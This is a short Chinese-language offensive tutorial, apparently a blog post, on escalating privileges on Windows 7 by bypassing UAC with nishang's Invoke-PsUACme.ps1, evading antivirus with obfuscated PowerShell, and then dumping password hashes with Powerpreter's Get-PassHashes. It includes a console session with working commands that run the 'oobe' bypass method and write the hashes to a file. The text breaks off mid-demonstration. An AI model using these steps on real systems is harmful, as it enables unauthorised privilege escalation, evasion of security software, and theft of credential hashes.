0x01 简介
l Powershell bypassUAC执行命令
l Powershell混淆绕过anti virus
l Windows server 2008/win7 nt6内核系统
0x02 Powershell简介
而从2008/win7开始windwos引入了powershell,而powershell是什么?可以简单的认为powershell是利用.net的各类库来实现往常cmd不能实现的功能,基于其强大的功能,往往也成为一些安全软件与系统安全的短板。
0x03 实现过程
回到提权的问题上,在powershell上可以通过bypass uac的操作来绕过系统阻止的访问操作,将自己操作的权限提升到id:500的管理员。
https://www.cnblogs.com/Chesky/p/UAC_Bypass.html有关UAC的概念和bypass相关可以查看上文。这里使用nishang的Invoke-PsUACme.ps1脚本
https://github.com/hfiref0x/UACME通过dll注入bypass的。测试环境 windows 7
当前用户权限处于管理员组,但id非500的用户。上传/或者ps动态加载Invoke-PsUACme.ps1到文件/内存中这里为了判断是否成功提升了权限我使用Powerpreter.psm1来导出hash,可以先提前执行下Powerpreter.psm1可以看到权限不够无法导出hash而且AV会拦截并删除脚本:如下图
已经被拦截了。接下来我bypassuac后在利用执行导hash操作
Microsoft Windows [版本 6.1.7600] 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。 C:\Users\123>powershell -exe bypass Windows PowerShell[/align][align=left] 版权所有 (C) 2009 Microsoft Corporation。保留所有权利。 PS C:\Users\123> Import-Module.\Desktop\Invoke-PsUACme.ps1 PS C:\Users\123> cd .\Desktop PS C:\Users\123\Desktop> Invoke-PsUACme -method oobe -Payload"powershell -exE bypass Import-Module C:\Users\123\Desktop\Powerpreter.psm1;Get-PassHashes> C:\Users\123\Desktop\1.txt" Using OOBE method